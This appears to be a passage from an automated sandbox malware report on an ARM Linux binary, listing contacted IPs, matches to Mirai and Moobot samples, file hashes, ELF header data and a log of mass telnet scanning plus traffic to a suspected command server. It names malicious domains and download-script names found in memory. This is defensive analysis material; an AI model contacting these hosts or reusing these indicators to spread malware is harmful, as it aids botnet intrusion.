kittlez.ru. [malformed]	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http:///wget.sh	arm4.elf	false		high
http:///curl.sh	arm4.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
16.72.19.8	unknown	United States	unknown	unknown	false
21.246.80.80	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.84.114.117	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
53.38.26.227	unknown	Germany	31399	DAIMLER-ASITIGNGlobalNetworkDE	false
34.165.31.3	unknown	United States	2686	ATGS-MMD-ASUS	false
160.24.255.58	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
102.30.246.215	unknown	Tunisia	5438	ATI-TN	false
28.43.37.155	unknown	United States	7922	COMCAST-7922US	false
162.39.13.215	unknown	United States	7029	WINDSTREAMUS	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false
16.77.138.247	unknown	United States	unknown	unknown	false
163.69.161.84	unknown	France	17816	CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovi	false
175.114.233.75	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
45.109.172.245	unknown	Egypt	37069	MOBINILEG	false
121.225.65.36	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
190.222.166.187	unknown	Peru	12252	AmericaMovilPeruSACPE	false
175.60.24.197	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
105.62.19.186	unknown	Kenya	33771	SAFARICOM-LIMITEDKE	false
57.120.199.241	unknown	Belgium	51964	ORANGE-BUSINESS-SERVICES-IPSN-ASNFR	false
3.185.109.249	unknown	United States	16509	AMAZON-02US	false
134.64.22.190	unknown	United States	385	AFCONC-BLOCK1-ASUS	false
118.163.76.89	unknown	Taiwan; Republic of China (ROC)	3462	HINETDataCommunicationBusinessGroupTW	false
85.114.179.192	unknown	Russian Federation	8439	AISTTogliattiRussiaRU	false
80.77.205.68	unknown	Malta	15735	DATASTREAM-NETMT	false
147.156.231.127	unknown	Spain	766	REDIRISRedIRISAutonomousSystemES	false
23.207.79.23	unknown	United States	8966	ETISALAT-ASPOBox1150DubaiUAE	false
23.185.156.128	unknown	Reserved	395852	MAYAVIRTUALUS	false
92.103.255.193	unknown	France	12670	AS-COMPLETELFR	false
73.139.184.123	unknown	United States	7922	COMCAST-7922US	false
47.200.110.237	unknown	United States	5650	FRONTIER-FRTRUS	false
82.241.224.181	unknown	France	12322	PROXADFR	false
37.22.199.62	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
79.163.40.134	unknown	Poland	5617	TPNETPL	false
136.112.202.104	unknown	United States	15169	GOOGLEUS	false
41.87.27.147	unknown	Malawi	36969	MTL-ASMW	false
64.191.69.190	unknown	United States	53828	NITELUS	false
201.73.138.150	unknown	Brazil	4230	CLAROSABR	false
88.12.42.142	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
182.109.211.92	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
185.93.89.106	cat-are-here.ru	United Kingdom	200861	TS-EMEA-ASNGB	false
140.232.20.133	unknown	United States	20115	CHARTER-20115US	false
150.171.47.88	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.57.48.123	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
45.215.74.98	unknown	Zambia	37287	ZAIN-ZAMBIAZM	false
2.250.184.17	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
150.130.165.69	unknown	United States	19773	MOTOROLAUS	false
145.15.146.255	unknown	Netherlands	21286	KPN-CORPORATE-MARKETNL	false
28.100.168.250	unknown	United States	7922	COMCAST-7922US	false
152.232.52.0	unknown	Brazil	7738	TelemarNorteLesteSABR	false
128.89.3.116	unknown	United States	11488	BBN-GWUS	false
47.10.180.5	unknown	Canada	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
37.167.173.36	unknown	France	51207	FREEMFR	false
132.67.217.202	unknown	Israel	378	MACHBA-ASILANIL	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
91.189.91.43	dlr.mips.elf	Get hash	malicious	Mirai	Browse
	arm6.elf	Get hash	malicious	Mirai	Browse
	rep.m68k.elf	Get hash	malicious	Mirai	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	mips.elf	Get hash	malicious	Mirai	Browse
	arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm5.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
91.189.91.42	dlr.mips.elf	Get hash	malicious	Mirai	Browse
	arm6.elf	Get hash	malicious	Mirai	Browse
	rep.m68k.elf	Get hash	malicious	Mirai	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	mips.elf	Get hash	malicious	Mirai	Browse
	arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm5.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cat-are-here.ru	mips.elf	Get hash	malicious	Mirai	Browse	185.93.89.106
	arm7.elf	Get hash	malicious	Mirai	Browse	185.93.89.106
	mips.elf	Get hash	malicious	Unknown	Browse	156.229.232.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DAIMLER-ASITIGNGlobalNetworkDE	rep.m68k.elf	Get hash	malicious	Mirai	Browse	53.90.244.177
	botnet.arm5.elf	Get hash	malicious	Mirai, Moobot	Browse	53.195.191.195
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	53.67.141.35
	botnet.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	53.40.163.48
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	53.33.209.117
	ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	53.18.190.12
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	53.213.218.99
	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	53.188.46.13
	ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	53.146.144.69
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	53.235.249.3
MICROSOFT-CORP-MSN-AS-BLOCKUS	Mc3FDUMnVz.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, RedLine	Browse	20.112.250.133
	mips.elf	Get hash	malicious	Mirai	Browse	52.238.108.30
	arm7.elf	Get hash	malicious	Mirai	Browse	40.104.12.84
	New order A24532848.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	Purchase forecast.xls	Get hash	malicious	Unknown	Browse	13.107.253.61
	uDF9cf2ziK.exe	Get hash	malicious	Amadey, RedLine	Browse	52.101.40.26
	rH3TpuMpZn.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, Vidar	Browse	52.101.40.26
	LaudoBombeiro.msi	Get hash	malicious	AteraAgent	Browse	40.113.176.130
	https://doxnero.sg-azure.top/	Get hash	malicious	HTMLPhisher	Browse	13.107.6.156
	https://us-west-2.protection.sophos.com/?d=powerbi.com&u=aHR0cHM6Ly9hcHAucG93ZXJiaS5jb20vdmlldz9yPWV5SnJJam9pWWpBNU5UZGtPVEl0T1RVNVpDMDBNVEl3TFRrNFpqVXROR1U1T0dWaU5XVTVNRE01SWl3aWRDSTZJakUxTVdNeE5qWmxMV00zWldFdE5HSTFaQzFoTWpRM0xUTmtNVEF5TlRFelkySXdNeUo5&i=NjAzNTFlYmUxMmQ2N2MzMjNhNzYzZDg0&t=cXRBVTE0Z3RLSGRTdEd4cm1WNzFhUm4wLzUzdXZKYklHYmduYnhYNlpsVT0=&h=5e715a0526a946bcaa614abc851141f0&s=AVNPUEhUT0NFTkNSWVBUSVYXtWfTC_gnxLfx0tqsdWatsuMxIHchoBDvy0tVrFrMxg	Get hash	malicious	Unknown	Browse	20.227.35.58
MICROSOFT-CORP-MSN-AS-BLOCKUS	Mc3FDUMnVz.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, RedLine	Browse	20.112.250.133
	mips.elf	Get hash	malicious	Mirai	Browse	52.238.108.30
	arm7.elf	Get hash	malicious	Mirai	Browse	40.104.12.84
	New order A24532848.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	Purchase forecast.xls	Get hash	malicious	Unknown	Browse	13.107.253.61
	uDF9cf2ziK.exe	Get hash	malicious	Amadey, RedLine	Browse	52.101.40.26
	rH3TpuMpZn.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, Vidar	Browse	52.101.40.26
	LaudoBombeiro.msi	Get hash	malicious	AteraAgent	Browse	40.113.176.130
	https://doxnero.sg-azure.top/	Get hash	malicious	HTMLPhisher	Browse	13.107.6.156
	https://us-west-2.protection.sophos.com/?d=powerbi.com&u=aHR0cHM6Ly9hcHAucG93ZXJiaS5jb20vdmlldz9yPWV5SnJJam9pWWpBNU5UZGtPVEl0T1RVNVpDMDBNVEl3TFRrNFpqVXROR1U1T0dWaU5XVTVNRE01SWl3aWRDSTZJakUxTVdNeE5qWmxMV00zWldFdE5HSTFaQzFoTWpRM0xUTmtNVEF5TlRFelkySXdNeUo5&i=NjAzNTFlYmUxMmQ2N2MzMjNhNzYzZDg0&t=cXRBVTE0Z3RLSGRTdEd4cm1WNzFhUm4wLzUzdXZKYklHYmduYnhYNlpsVT0=&h=5e715a0526a946bcaa614abc851141f0&s=AVNPUEhUT0NFTkNSWVBUSVYXtWfTC_gnxLfx0tqsdWatsuMxIHchoBDvy0tVrFrMxg	Get hash	malicious	Unknown	Browse	20.227.35.58
ATGS-MMD-ASUS	mips.elf	Get hash	malicious	Mirai	Browse	32.79.80.242
	arm7.elf	Get hash	malicious	Mirai	Browse	56.172.19.240
	botnet.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	48.135.128.41
	http:///sites.google.com/view/drive-u-7-home/	Get hash	malicious	Unknown	Browse	34.8.123.242
	botnet.arm5.elf	Get hash	malicious	Mirai, Moobot	Browse	32.192.28.38
	botnet.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	34.135.66.122
	botnet.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	32.253.101.15
	.Sarm5.elf	Get hash	malicious	Mirai	Browse	34.151.41.173
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	34.152.104.220
	botnet.arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	34.10.158.19

File type:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy (8bit):	6.224393392590817
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	arm4.elf
File size:	96'400 bytes
MD5:	2e611d06aeb1cc3dac822323b6d17a6c
SHA1:	93a697b34c5c9d6d60f7bc05b9b0553a618e2ad1
SHA256:	879f8c06476799fb014da7f4197f72f977dc2e2025d6fd01126c1d1e349f371e
SHA512:	b4d541309ce1a770c5401e3a3e2f4f96282871e514ed61c17089eebaecb2e9044332f363c3c15215aca0db69da241f5ebd584b43cb47f37fe28468f63375fc91
SSDEEP:	1536:tAzf9dCevvk7tZGC1eedV59bQ74wVjqrE2SUF+RTFuDOBuMvFtiCKkRZ:tAzfTC1eedxA4wpb2zF1ipLiCKu
TLSH:	8B933989B8D19E26C5D552BFFA5F82AC373193F4C1DBB207DC146B257B8282B1C6B211
File Content Preview:	.ELF...a..........(.........4....w......4. ...(......................s...s...............s...s...s.......4..........Q.td..................................-...L."....P..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	ARM - ABI
ABI Version:	0
Entry Point Address:	0x8190
Flags:	0x202
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	96000
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8094	0x94	0x18	0x0	0x6	AX	4
.text	PROGBITS	0x80b0	0xb0	0x14300	0x0	0x6	AX	16
.fini	PROGBITS	0x1c3b0	0x143b0	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x1c3c4	0x143c4	0x2ff0	0x0	0x2	A	4
.ctors	PROGBITS	0x273b8	0x173b8	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x273c0	0x173c0	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x273cc	0x173cc	0x2f4	0x0	0x3	WA	4
.bss	NOBITS	0x276c0	0x176c0	0x31a0	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x176c0	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0x173b4	0x173b4	6.2526	0x5	R E	0x8000	.init .text .fini .rodata
LOAD	0x173b8	0x273b8	0x273b8	0x308	0x34a8	1.7479	0x6	RW	0x8000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2025 20:58:08.393800020 CET	36540	23	192.168.2.23	16.77.138.247
Feb 10, 2025 20:58:08.398617983 CET	23	36540	16.77.138.247	192.168.2.23
Feb 10, 2025 20:58:08.398677111 CET	36540	23	192.168.2.23	16.77.138.247
Feb 10, 2025 20:58:08.398736000 CET	59798	23	192.168.2.23	88.12.42.142
Feb 10, 2025 20:58:08.401926994 CET	55136	23	192.168.2.23	13.84.114.117
Feb 10, 2025 20:58:08.403489113 CET	23	59798	88.12.42.142	192.168.2.23
Feb 10, 2025 20:58:08.403527975 CET	59798	23	192.168.2.23	88.12.42.142
Feb 10, 2025 20:58:08.404881001 CET	46280	23	192.168.2.23	150.171.47.88
Feb 10, 2025 20:58:08.406769991 CET	23	55136	13.84.114.117	192.168.2.23
Feb 10, 2025 20:58:08.406872034 CET	55136	23	192.168.2.23	13.84.114.117
Feb 10, 2025 20:58:08.407563925 CET	50600	23	192.168.2.23	175.114.233.75
Feb 10, 2025 20:58:08.409722090 CET	23	46280	150.171.47.88	192.168.2.23
Feb 10, 2025 20:58:08.409815073 CET	46280	23	192.168.2.23	150.171.47.88
Feb 10, 2025 20:58:08.411268950 CET	39708	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:08.412322998 CET	55080	23	192.168.2.23	73.139.184.123
Feb 10, 2025 20:58:08.412354946 CET	23	50600	175.114.233.75	192.168.2.23
Feb 10, 2025 20:58:08.412412882 CET	50600	23	192.168.2.23	175.114.233.75
Feb 10, 2025 20:58:08.414938927 CET	46640	23	192.168.2.23	47.200.110.237
Feb 10, 2025 20:58:08.416055918 CET	38241	39708	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:08.416105032 CET	39708	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:08.417104959 CET	23	55080	73.139.184.123	192.168.2.23
Feb 10, 2025 20:58:08.417148113 CET	55080	23	192.168.2.23	73.139.184.123
Feb 10, 2025 20:58:08.417752981 CET	49000	23	192.168.2.23	182.109.211.92
Feb 10, 2025 20:58:08.419729948 CET	23	46640	47.200.110.237	192.168.2.23
Feb 10, 2025 20:58:08.419773102 CET	46640	23	192.168.2.23	47.200.110.237
Feb 10, 2025 20:58:08.420531034 CET	39708	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:08.421681881 CET	57402	23	192.168.2.23	163.69.161.84
Feb 10, 2025 20:58:08.422533035 CET	23	49000	182.109.211.92	192.168.2.23
Feb 10, 2025 20:58:08.422575951 CET	49000	23	192.168.2.23	182.109.211.92
Feb 10, 2025 20:58:08.424863100 CET	48468	23	192.168.2.23	201.73.138.150
Feb 10, 2025 20:58:08.425362110 CET	38241	39708	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:08.425479889 CET	39708	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:08.426456928 CET	23	57402	163.69.161.84	192.168.2.23
Feb 10, 2025 20:58:08.426501036 CET	57402	23	192.168.2.23	163.69.161.84
Feb 10, 2025 20:58:08.427535057 CET	36544	23	192.168.2.23	47.10.180.5
Feb 10, 2025 20:58:08.429658890 CET	23	48468	201.73.138.150	192.168.2.23
Feb 10, 2025 20:58:08.429712057 CET	48468	23	192.168.2.23	201.73.138.150
Feb 10, 2025 20:58:08.430061102 CET	59246	23	192.168.2.23	41.87.27.147
Feb 10, 2025 20:58:08.430227995 CET	38241	39708	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:08.432332993 CET	23	36544	47.10.180.5	192.168.2.23
Feb 10, 2025 20:58:08.432385921 CET	36544	23	192.168.2.23	47.10.180.5
Feb 10, 2025 20:58:08.433011055 CET	58346	23	192.168.2.23	82.241.224.181
Feb 10, 2025 20:58:08.434807062 CET	23	59246	41.87.27.147	192.168.2.23
Feb 10, 2025 20:58:08.434849977 CET	59246	23	192.168.2.23	41.87.27.147
Feb 10, 2025 20:58:08.435550928 CET	49802	23	192.168.2.23	34.165.31.3
Feb 10, 2025 20:58:08.437864065 CET	23	58346	82.241.224.181	192.168.2.23
Feb 10, 2025 20:58:08.437901974 CET	33916	23	192.168.2.23	92.103.255.193
Feb 10, 2025 20:58:08.437947035 CET	58346	23	192.168.2.23	82.241.224.181
Feb 10, 2025 20:58:08.440275908 CET	23	49802	34.165.31.3	192.168.2.23
Feb 10, 2025 20:58:08.440383911 CET	49802	23	192.168.2.23	34.165.31.3
Feb 10, 2025 20:58:08.442497969 CET	54252	23	192.168.2.23	28.43.37.155
Feb 10, 2025 20:58:08.442732096 CET	23	33916	92.103.255.193	192.168.2.23
Feb 10, 2025 20:58:08.442775965 CET	33916	23	192.168.2.23	92.103.255.193
Feb 10, 2025 20:58:08.445173025 CET	55064	23	192.168.2.23	45.215.74.98
Feb 10, 2025 20:58:08.447299957 CET	23	54252	28.43.37.155	192.168.2.23
Feb 10, 2025 20:58:08.447355986 CET	54252	23	192.168.2.23	28.43.37.155
Feb 10, 2025 20:58:08.447561979 CET	36070	23	192.168.2.23	80.77.205.68
Feb 10, 2025 20:58:08.449982882 CET	23	55064	45.215.74.98	192.168.2.23
Feb 10, 2025 20:58:08.450040102 CET	55064	23	192.168.2.23	45.215.74.98
Feb 10, 2025 20:58:08.450200081 CET	58308	23	192.168.2.23	21.246.80.80
Feb 10, 2025 20:58:08.452339888 CET	23	36070	80.77.205.68	192.168.2.23
Feb 10, 2025 20:58:08.452395916 CET	36070	23	192.168.2.23	80.77.205.68
Feb 10, 2025 20:58:08.453166962 CET	60288	23	192.168.2.23	79.163.40.134
Feb 10, 2025 20:58:08.455162048 CET	23	58308	21.246.80.80	192.168.2.23
Feb 10, 2025 20:58:08.455220938 CET	58308	23	192.168.2.23	21.246.80.80
Feb 10, 2025 20:58:08.455703020 CET	35182	23	192.168.2.23	102.30.246.215
Feb 10, 2025 20:58:08.458273888 CET	43424	23	192.168.2.23	118.163.76.89
Feb 10, 2025 20:58:08.460917950 CET	23	60288	79.163.40.134	192.168.2.23
Feb 10, 2025 20:58:08.460963011 CET	60288	23	192.168.2.23	79.163.40.134
Feb 10, 2025 20:58:08.461440086 CET	23	35182	102.30.246.215	192.168.2.23
Feb 10, 2025 20:58:08.461481094 CET	35182	23	192.168.2.23	102.30.246.215
Feb 10, 2025 20:58:08.461525917 CET	59958	23	192.168.2.23	57.120.199.241
Feb 10, 2025 20:58:08.463993073 CET	23	43424	118.163.76.89	192.168.2.23
Feb 10, 2025 20:58:08.464031935 CET	43424	23	192.168.2.23	118.163.76.89
Feb 10, 2025 20:58:08.467375994 CET	23	59958	57.120.199.241	192.168.2.23
Feb 10, 2025 20:58:08.467468023 CET	59958	23	192.168.2.23	57.120.199.241
Feb 10, 2025 20:58:08.483393908 CET	34508	23	192.168.2.23	37.167.173.36
Feb 10, 2025 20:58:08.489732981 CET	23	34508	37.167.173.36	192.168.2.23
Feb 10, 2025 20:58:08.491338968 CET	34508	23	192.168.2.23	37.167.173.36
Feb 10, 2025 20:58:08.512968063 CET	39874	23	192.168.2.23	37.22.199.62
Feb 10, 2025 20:58:08.517940998 CET	45238	23	192.168.2.23	91.57.48.123
Feb 10, 2025 20:58:08.518769979 CET	23	39874	37.22.199.62	192.168.2.23
Feb 10, 2025 20:58:08.518821001 CET	39874	23	192.168.2.23	37.22.199.62
Feb 10, 2025 20:58:08.521275043 CET	60198	23	192.168.2.23	23.185.156.128
Feb 10, 2025 20:58:08.523602962 CET	23	45238	91.57.48.123	192.168.2.23
Feb 10, 2025 20:58:08.523654938 CET	45238	23	192.168.2.23	91.57.48.123
Feb 10, 2025 20:58:08.524256945 CET	39072	23	192.168.2.23	134.64.22.190
Feb 10, 2025 20:58:08.526962996 CET	23	60198	23.185.156.128	192.168.2.23
Feb 10, 2025 20:58:08.527012110 CET	60198	23	192.168.2.23	23.185.156.128
Feb 10, 2025 20:58:08.527105093 CET	34786	23	192.168.2.23	3.185.109.249
Feb 10, 2025 20:58:08.530023098 CET	23	39072	134.64.22.190	192.168.2.23
Feb 10, 2025 20:58:08.530078888 CET	39072	23	192.168.2.23	134.64.22.190
Feb 10, 2025 20:58:08.532902956 CET	23	34786	3.185.109.249	192.168.2.23
Feb 10, 2025 20:58:08.533044100 CET	34786	23	192.168.2.23	3.185.109.249
Feb 10, 2025 20:58:08.536761045 CET	60762	23	192.168.2.23	152.232.52.0
Feb 10, 2025 20:58:08.539988041 CET	42072	23	192.168.2.23	64.191.69.190
Feb 10, 2025 20:58:08.543188095 CET	47384	23	192.168.2.23	140.232.20.133
Feb 10, 2025 20:58:08.545871973 CET	23	60762	152.232.52.0	192.168.2.23
Feb 10, 2025 20:58:08.545927048 CET	60762	23	192.168.2.23	152.232.52.0
Feb 10, 2025 20:58:08.546416044 CET	55490	23	192.168.2.23	16.72.19.8
Feb 10, 2025 20:58:08.549066067 CET	23	42072	64.191.69.190	192.168.2.23
Feb 10, 2025 20:58:08.549132109 CET	42072	23	192.168.2.23	64.191.69.190
Feb 10, 2025 20:58:08.552242994 CET	23	47384	140.232.20.133	192.168.2.23
Feb 10, 2025 20:58:08.552361965 CET	47384	23	192.168.2.23	140.232.20.133
Feb 10, 2025 20:58:08.554292917 CET	23	55490	16.72.19.8	192.168.2.23
Feb 10, 2025 20:58:08.557403088 CET	55490	23	192.168.2.23	16.72.19.8
Feb 10, 2025 20:58:08.626259089 CET	32976	23	192.168.2.23	160.24.255.58
Feb 10, 2025 20:58:08.634267092 CET	23	32976	160.24.255.58	192.168.2.23
Feb 10, 2025 20:58:08.634356022 CET	32976	23	192.168.2.23	160.24.255.58
Feb 10, 2025 20:58:08.649317026 CET	44756	23	192.168.2.23	190.222.166.187
Feb 10, 2025 20:58:08.654192924 CET	23	44756	190.222.166.187	192.168.2.23
Feb 10, 2025 20:58:08.654344082 CET	44756	23	192.168.2.23	190.222.166.187
Feb 10, 2025 20:58:08.658755064 CET	51962	23	192.168.2.23	85.114.179.192
Feb 10, 2025 20:58:08.663605928 CET	23	51962	85.114.179.192	192.168.2.23
Feb 10, 2025 20:58:08.664077044 CET	51962	23	192.168.2.23	85.114.179.192
Feb 10, 2025 20:58:08.677973986 CET	40534	23	192.168.2.23	145.15.146.255
Feb 10, 2025 20:58:08.682827950 CET	23	40534	145.15.146.255	192.168.2.23
Feb 10, 2025 20:58:08.682894945 CET	40534	23	192.168.2.23	145.15.146.255
Feb 10, 2025 20:58:08.696499109 CET	50950	23	192.168.2.23	162.39.13.215
Feb 10, 2025 20:58:08.702645063 CET	40150	23	192.168.2.23	2.250.184.17
Feb 10, 2025 20:58:08.704405069 CET	23	50950	162.39.13.215	192.168.2.23
Feb 10, 2025 20:58:08.704472065 CET	50950	23	192.168.2.23	162.39.13.215
Feb 10, 2025 20:58:08.708112001 CET	23	40150	2.250.184.17	192.168.2.23
Feb 10, 2025 20:58:08.709436893 CET	40150	23	192.168.2.23	2.250.184.17
Feb 10, 2025 20:58:08.710591078 CET	43446	23	192.168.2.23	147.156.231.127
Feb 10, 2025 20:58:08.715965033 CET	23	43446	147.156.231.127	192.168.2.23
Feb 10, 2025 20:58:08.718157053 CET	43446	23	192.168.2.23	147.156.231.127
Feb 10, 2025 20:58:08.733412981 CET	54740	23	192.168.2.23	28.100.168.250
Feb 10, 2025 20:58:08.738854885 CET	23	54740	28.100.168.250	192.168.2.23
Feb 10, 2025 20:58:08.738909960 CET	54740	23	192.168.2.23	28.100.168.250
Feb 10, 2025 20:58:08.761529922 CET	43164	23	192.168.2.23	23.207.79.23
Feb 10, 2025 20:58:08.767011881 CET	23	43164	23.207.79.23	192.168.2.23
Feb 10, 2025 20:58:08.767076015 CET	43164	23	192.168.2.23	23.207.79.23
Feb 10, 2025 20:58:08.769866943 CET	39876	23	192.168.2.23	136.112.202.104
Feb 10, 2025 20:58:08.774771929 CET	23	39876	136.112.202.104	192.168.2.23
Feb 10, 2025 20:58:08.774825096 CET	39876	23	192.168.2.23	136.112.202.104
Feb 10, 2025 20:58:08.775377989 CET	47978	23	192.168.2.23	175.60.24.197
Feb 10, 2025 20:58:08.780153036 CET	23	47978	175.60.24.197	192.168.2.23
Feb 10, 2025 20:58:08.782121897 CET	47978	23	192.168.2.23	175.60.24.197
Feb 10, 2025 20:58:08.782598972 CET	56570	23	192.168.2.23	53.38.26.227
Feb 10, 2025 20:58:08.787432909 CET	23	56570	53.38.26.227	192.168.2.23
Feb 10, 2025 20:58:08.789091110 CET	56570	23	192.168.2.23	53.38.26.227
Feb 10, 2025 20:58:08.789479017 CET	47164	23	192.168.2.23	45.109.172.245
Feb 10, 2025 20:58:08.794251919 CET	23	47164	45.109.172.245	192.168.2.23
Feb 10, 2025 20:58:08.794333935 CET	47164	23	192.168.2.23	45.109.172.245
Feb 10, 2025 20:58:08.795829058 CET	47144	23	192.168.2.23	121.225.65.36
Feb 10, 2025 20:58:08.800621033 CET	23	47144	121.225.65.36	192.168.2.23
Feb 10, 2025 20:58:08.800674915 CET	47144	23	192.168.2.23	121.225.65.36
Feb 10, 2025 20:58:08.801604986 CET	54410	23	192.168.2.23	150.130.165.69
Feb 10, 2025 20:58:08.806657076 CET	23	54410	150.130.165.69	192.168.2.23
Feb 10, 2025 20:58:08.806704998 CET	54410	23	192.168.2.23	150.130.165.69
Feb 10, 2025 20:58:08.807049990 CET	54154	23	192.168.2.23	105.62.19.186
Feb 10, 2025 20:58:08.816371918 CET	23	54154	105.62.19.186	192.168.2.23
Feb 10, 2025 20:58:08.816430092 CET	54154	23	192.168.2.23	105.62.19.186
Feb 10, 2025 20:58:08.816946983 CET	46014	23	192.168.2.23	128.89.3.116
Feb 10, 2025 20:58:08.823546886 CET	23	46014	128.89.3.116	192.168.2.23
Feb 10, 2025 20:58:08.823559046 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 20:58:08.823591948 CET	46014	23	192.168.2.23	128.89.3.116
Feb 10, 2025 20:58:08.890502930 CET	45104	23	192.168.2.23	132.67.217.202
Feb 10, 2025 20:58:08.895977974 CET	23	45104	132.67.217.202	192.168.2.23
Feb 10, 2025 20:58:08.896063089 CET	45104	23	192.168.2.23	132.67.217.202
Feb 10, 2025 20:58:09.023173094 CET	38241	39708	185.93.89.106	192.168.2.23
Feb 10, 2025 20:58:09.023318052 CET	39708	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:09.023432016 CET	39708	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:58:09.138024092 CET	45104	23	192.168.2.23	132.67.217.202
Feb 10, 2025 20:58:09.138024092 CET	47144	23	192.168.2.23	121.225.65.36
Feb 10, 2025 20:58:09.138027906 CET	46014	23	192.168.2.23	128.89.3.116
Feb 10, 2025 20:58:09.138031006 CET	54410	23	192.168.2.23	150.130.165.69
Feb 10, 2025 20:58:09.138027906 CET	54154	23	192.168.2.23	105.62.19.186
Feb 10, 2025 20:58:09.138027906 CET	56570	23	192.168.2.23	53.38.26.227
Feb 10, 2025 20:58:09.138041973 CET	47164	23	192.168.2.23	45.109.172.245
Feb 10, 2025 20:58:09.138056040 CET	47978	23	192.168.2.23	175.60.24.197
Feb 10, 2025 20:58:09.138056040 CET	39876	23	192.168.2.23	136.112.202.104
Feb 10, 2025 20:58:09.138062954 CET	43164	23	192.168.2.23	23.207.79.23
Feb 10, 2025 20:58:09.138067961 CET	54740	23	192.168.2.23	28.100.168.250
Feb 10, 2025 20:58:09.138082027 CET	40150	23	192.168.2.23	2.250.184.17
Feb 10, 2025 20:58:09.138087988 CET	43446	23	192.168.2.23	147.156.231.127
Feb 10, 2025 20:58:09.138098955 CET	50950	23	192.168.2.23	162.39.13.215
Feb 10, 2025 20:58:09.138098955 CET	40534	23	192.168.2.23	145.15.146.255
